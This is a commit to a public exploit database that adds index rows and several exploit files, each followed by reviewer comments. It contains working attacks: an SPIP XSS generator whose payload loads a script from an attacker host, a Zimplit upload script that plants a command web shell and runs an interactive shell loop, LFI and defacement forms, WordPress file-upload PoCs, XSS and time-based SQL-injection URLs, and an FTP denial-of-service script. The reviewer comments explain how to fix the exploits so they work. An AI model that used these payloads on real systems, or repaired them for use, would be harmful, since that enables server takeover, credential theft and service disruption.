DB: 2015-06-28

6 new exploits
Offensive Security 2015-06-28 05:02:56 +00:00
parent fcb4d832b3
commit 6f83383e35
8 changed files with 406 additions and 56 deletions


@ -6303,7 +6303,7 @@ id,file,description,date,author,platform,type,port
6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 (index.php cat) SQL Injection Vulnerability",2008-10-12,Hakxer,php,webapps,0
6737,platforms/php/webapps/6737.txt,"LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0
6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0
6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0
6739,platforms/php/webapps/6739.txt,"NewLife Blogger <= 3.0 Insecure Cookie Handling / SQL Injection Vuln",2008-10-12,Pepelux,php,webapps,0
6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 (index.php) Local File Download Vulnerability",2008-10-12,JosS,php,webapps,0
6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service Exploit",2008-10-13,shinnai,windows,dos,0
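Review bot: the only change in this hunk is the " - " separator added to the 6738 description, but the surrounding rows in the same context are left as they are (6735 "Globsy <= 1.0 - Remote File Rewriting Exploit" and 6741 already use the separator, while 6736, 6737, 6739 and 6740 still use the "Product version Title" form), so the block stays inconsistent either way. If the aim is the "Product version - Title" convention, normalise the neighbouring rows in the same pass; otherwise this edit to a 2008 row is unrelated to the "6 new exploits" of the commit message and deserves a mention there.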
@ -33747,3 +33747,9 @@ id,file,description,date,author,platform,type,port
37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
37394,platforms/multiple/webapps/37394.txt,"Thycotic Secret Server 8.8.000004 - Stored XSS",2015-06-26,"Marco Delai",multiple,webapps,0
37395,platforms/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Stored XSS",2015-06-26,"Suraj Krishnaswami",windows,webapps,0
37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-13,Sangteamtham,windows,remote,0
37397,platforms/php/webapps/37397.html,"SPIP 2.x Multiple Cross Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0
37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 Local File Include and Arbitrary File Upload Vulnerabilities",2012-06-13,KedAns-Dz,php,webapps,0
37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin 'uploadPhotoApres.php' Arbitrary File Upload Vulnerability",2012-01-14,"Sammy FORGIT",php,webapps,0
37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin 'ofc_upload_image.php' Arbitrary File Upload Vulnerability",2012-06-14,"Sammy FORGIT",php,webapps,0
37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x 'uselang' Parameter Cross Site Scripting Vulnerability",2012-06-17,anonymous,php,webapps,0
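Review bot: row 37396 files the XAMPP entry as platform "windows", type "remote", although its title is "Multiple Cross Site Scripting and SQL Injection Vulnerabilities" and every other web issue added in this hunk (37397, 37398, 37399, 37403, 37404) is filed as "php,webapps"; by the convention visible in the neighbouring rows, XSS and SQL injection in bundled PHP/Perl pages belong under webapps with the platform naming the application language, not the host OS. Two smaller points: ids 37400 to 37402 are skipped between 37399 and 37403, fine if they are reserved but worth a word in the commit message; and the new rows carry 2012 disclosure dates rather than the 2015-06-26 of the context rows above, with 37399 at 2012-01-14 standing apart from the June 2012 cluster of its siblings, so that date should be checked against its source.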



@ -0,0 +1,87 @@
source: http://www.securityfocus.com/bid/53983/info
SPIP is prone to multiple unspecified cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to SPIP 2.0.20, 2.1.15, and 3.0.2 are vulnerable.
Exploit generator:
------------------
<html>
<head>
<script>
function trim(s){
return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
}
function encodeToHex(s){
var r="";
var h;
for(var c=0;c<s.length;c++){
h=s.charCodeAt(c).toString(16);
while(h.length<3) h="%"+h;
r+=h;
}
return r;
}
function generateXSS(){
var target = trim(document.getElementById("target").value);
var version = trim(document.getElementById("version").value);
var content = trim(document.getElementById("content").value);
var resultjs = "";
resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>";
resultjs += "<input type='hidden' name='exec' value='" + version + "' />";
resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />";
resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";
document.getElementById("resultjs").value = resultjs;
}
</script>
</head>
<body onload="generateXSS();">
<h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2>
<p>
This XSS, non-persistent, use POST vars through admin panel.<br />
The target is the attribute "name" of an input markup hidden.<br />
This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br />
Magic_quote_gcp = Off needed.
</p>
<form action="" onsubmit="generateXSS();return false;">
<table>
<tr>
<td>URL's SPIP Targeted :</td>
<td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td>
</tr>
<tr>
<td>SPIP version :</td>
<td>
<select id="version" onchange="generateXSS();">
<option value="base_repair">3.0.X (up to 3.0.1 included)</option>
<option value="admin_repair">2.1.X (up to 2.1.14 included)</option>
</select>
</td>
</tr>
<tr>
<td>JavaScript code to execute :<br />(without <script> & </script> markup)</td>
<td>
<textarea cols="70" rows="10" id="content" onkeyup="generateXSS();">
alert(document.cookie);
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ha.ck.er.xxx/beEf.js";
document.body.appendChild(script);
&lt;/textarea&gt;
</td>
</tr>
<tr>
<td>Exploit to send to an admin : </td>
<td>
<textarea cols="70" rows="10" id="resultjs" readonly="readonly">&lt;/textarea&gt;
</td>
</tr>
</table>
</form>
</body>
</html>
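Review bot: the two closing textarea tags are rendered as `&lt;/textarea&gt;` (the line after `document.body.appendChild(script);` and the `id="resultjs"` line) while every other tag in the file is a real tag; if those entities are literal in the committed file, the first textarea never closes, the result textarea becomes text inside it, `document.getElementById("resultjs")` returns null and `generateXSS()` throws on load. Confirm the file contains `</textarea>` at both places. Separately, `encodeToHex()` only yields valid `%xx` escapes for code points 0x10 to 0xFF: below 0x10 the `while(h.length<3)` loop produces `%%x`, and above 0xFF the hex is three or more digits and gets no `%` at all, where `unescape()` would need `%uXXXX`. The generator works for the default payload only because `trim()` strips CR, LF and TAB first; a comment stating that the payload must be printable ASCII, or a `%uXXXX` branch for wider code points, would save the next user a confusing failure.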

platforms/php/webapps/37398.php Executable file

@ -0,0 +1,191 @@
source: http://www.securityfocus.com/bid/53990/info
Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
Zimplit CMS 3.0 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com
# platform : php
# Type : Multiple Vulnerabilities
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En)
# Download : [http://www.zimplit.com/order.html]
###
# <3 <3 Greetings t0 Palestine <3 <3
# Exploit's / p0c's ====>
##### Exp(1) Arbitrary File/Shell Upload =>
<!-- p0c (1) -->
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n|==================================================|";
print "\n| Zimplit CMS v3.0 <= Arbitrary Shell Upload |";
print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com> |";
print "\n|==================================================|\n";
if ($argc < 2)
{
print "\nUsage : php $argv[0] [host] [path]";
print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--31337\r\n";
$data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--31337--\r\n";
$packet = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=31337\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\n Inj3ct0rK3d-Sh3lL#";
$cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
if ($cmd != "exit")
{
$packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # for Encoded You'r Shell
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
<!-- p0c (2) -->
<form action="http://[Target]/zimplit.php?action=upload&folder=editor/files" method="post">
<input type="file" name="file" size="50"/>
<input type="hidden" name="file" />
<input type="submit" value="Upload Sh3ll/File !" />
</form>
[+] Access Shell http://[Target]/editor/files/k3d.php
[+] Access Shell http://[Target]/editor/files/{ U R Shell }.*
##### Exp(2) Edit HTML (index.html) File =>
<form action='http://[target]/zimplit.php?action=save&file=index.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
&lt;/textarea&gt;
<input type='submit' value='Edit HTML Page'>
</form>
##### Exp(3) Add new HTML File/Page =>
<form action='http://[target]/zimplit.php?action=new&file=dz0.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
&lt;/textarea&gt;
<input type='submit' value='Creat new HTML Page'>
</form>
##### Exp(4) Local File Include =>
<!-- p0c (1) -->
<form action='http://[target]/zimplit.php?action=load&file=../../../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Included Local File'>
</form>
<!-- p0c (2) -->
<?php
$lfi =
curl_init("http://[Target]/editor/zimplit_js.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
<!-- p0c (3) -->
<?php
$lfi =
curl_init("http://[Target]/editor/user.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
#### << ThE|End
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================
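Review bot: in the Exp(1) PHP PoC the upload is sent to `folder=editor/files`, and the author's own p0c(2) lines give the shell location as `http://[Target]/editor/files/k3d.php`, yet the command loop requests `GET {$path}k3d.php{$html[3]}`, i.e. a file at the Zimplit root, so every command ends in "[-] Exploit failed..."; request `{$path}editor/files/k3d.php` (or the path captured in `$html[2]`) instead. In the same script, `POST {$path}/zimplit.php` combined with the documented `/zimplit/` argument yields `/zimplit//zimplit.php`, and `define(STDIN, ...)` is redundant under the CLI, which already provides `STDIN`, and wrong as written since its first argument is the resource rather than a string; both are hidden by `error_reporting(0)`. The p0c(2) HTML form has no `enctype="multipart/form-data"`, so its file input submits only a filename, and it names the field `file` (twice) while the PHP PoC sends `File`. In Exp(4) p0c(2) and p0c(3), `%00` inside a CURLOPT_POSTFIELDS array is form-encoded and reaches the server as `%2500`, not a NUL byte, so the null-byte truncation the payload relies on never happens; the PHP string needs a literal `\0` (the GET form in p0c(1) is fine, because the server decodes `%00` from the query string). Finally, `eregi()` is deprecated since PHP 5.3 and gone in PHP 7; `preg_match()` with the `i` flag is the replacement.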

platforms/php/webapps/37399.php Executable file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/53994/info
Evarisk plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Evarisk 5.1.5.4 is vulnerable; other versions may also be affected.
<?php
$headers = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?qqfile=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
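Review bot: the PoC prints the raw response but never says where `lo.php` is written, so a reader cannot verify success or reach the uploaded `phpinfo()`; either document the directory `uploadPhotoApres.php` stores the file in, or parse the response for the stored path. The request shape itself is consistent with the uploader's XHR mode (file name in `qqfile=`, file bytes as the raw POST body with `Content-Type: application/octet-stream`), but the `@` in `@$uploadfile` suppresses nothing on a plain variable and should go.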

platforms/php/webapps/37403.php Executable file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/53995/info
Invit0r plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Invit0r 0.22 is vulnerable; other versions may also be affected.
ders = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
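Review bot: the committed body starts at `ders = array("Content-Type: application/octet-stream");`, so the `<?php` opening tag and the `$hea` prefix of `$headers` are missing while the closing `?>` on the last line is present; as a file this is not valid PHP and a web server would serve the first line as text. The sibling PoC 37399.php shows the intended first two lines (`<?php` followed by `$headers = array(...)`); restore them before merging. As with 37399, the script does not say where `ofc_upload_image.php` writes `lo.php`, so add the destination or parse the response.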


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53998/info
MediaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MediaWiki versions prior to 1.17.5, 1.18.4, and 1.19.1 are vulnerable.
http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27
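Review bot: the PoC is attribute-context injection (`%27` closes a single-quoted attribute and the trailing `e=%27` re-opens one to swallow the original closing quote) and the handler is `onmouseover`, so it fires only after the victim hovers the element; the advisory text should name the element that reflects `uselang` and state that user interaction is required. `eval(alert(1))` is also redundant, `alert(1)` alone demonstrates the issue.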


@ -1,55 +1,55 @@
# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
# GuildFTPd URL - http://www.guildftpd.com
# cwd/list heap corruption
# overwrite registers in free(): ecx, edi
#
# (x)dmnt 2008
# feel free to do shellcode
# -*- coding: windows-1252 -*-
import socket
import sys, time
evil_cwd = "/."*124
evil_dir = "X"*100
def help_info():
print ("Usage: guildd0s <host> <login> <password>\n")
print ("Note: anonymous is enought\n")
def dos_it(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\n" %username)
r=sock.recv(1024)
sock.send("pass %s\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
sock.send("cwd %s\n" %evil_cwd)
r=sock.recv(1024)
sock.send("list %s\r\n" %evil_dir)
time.sleep(3)
sock.close()
print "[!] Now server d0s'ed/heap corrupted"
print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[")
print ("](x)dmnt 2008[\n\n")
if len(sys.argv) <> 4:
help_info()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
dos_it(hostname,username,passwd)
sys.exit(0)
# milw0rm.com [2008-10-12]
# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
# GuildFTPd URL - http://www.guildftpd.com
# cwd/list heap corruption
# overwrite registers in free(): ecx, edi
#
# (x)dmnt 2008
# feel free to do shellcode
# -*- coding: windows-1252 -*-
import socket
import sys, time
evil_cwd = "/."*124
evil_dir = "X"*100
def help_info():
print ("Usage: guildd0s <host> <login> <password>\n")
print ("Note: anonymous is enought\n")
def dos_it(hostname, username, passwd):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
sock.send("user %s\n" %username)
r=sock.recv(1024)
sock.send("pass %s\n" %passwd)
r=sock.recv(1024)
print "[+] Send evil string"
sock.send("cwd %s\n" %evil_cwd)
r=sock.recv(1024)
sock.send("list %s\r\n" %evil_dir)
time.sleep(3)
sock.close()
print "[!] Now server d0s'ed/heap corrupted"
print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[")
print ("](x)dmnt 2008[\n\n")
if len(sys.argv) <> 4:
help_info()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
dos_it(hostname,username,passwd)
sys.exit(0)
# milw0rm.com [2008-10-12]
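Review bot: the `@ -1,55 +1,55 @@` hunk rewrites the whole file, but the old and new halves shown here are identical line for line (header comment, `evil_cwd = "/."*124`, `dos_it()`, the `milw0rm.com [2008-10-12]` footer), so the change can only be whitespace or line endings; a full-file rewrite with no visible textual diff should be named in the commit message, which only says "6 new exploits", and is the kind of change to confirm with `git diff -w` so reviewers know nothing else moved. Present in both halves and worth a follow-up rather than a fix in this commit: `user`, `pass` and `cwd` are terminated with `\n` while `list` uses `\r\n` (RFC 959 requires CRLF for every command), and the bare `print` statements and the `<>` operator are Python 2 only.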


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/53979/info
XAMPP for Windows is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xampp/perlinfo.pl/"<script>alert("XSS")</script>
http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606
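Review bot: unlike the other advisories in this commit, the file never states the affected version; it says only "XAMPP for Windows is prone to ..." while the files.csv row pins it to 1.7.7, so add the "X is vulnerable; other versions may also be affected" line the sibling files carry. The three URLs are also given unencoded: the `perlinfo.pl` one contains literal `"`, `<` and `>`, and the `cds.php` SQL injection contains literal spaces in `jahr=1967 and sleep(1) `, which a browser encodes on the fly but non-browser clients may not; percent-encode them. And since that SQL injection PoC is blind and time-based, the only observable is a delay of roughly one second in the response, which the text should say so that a tester knows what a positive result looks like.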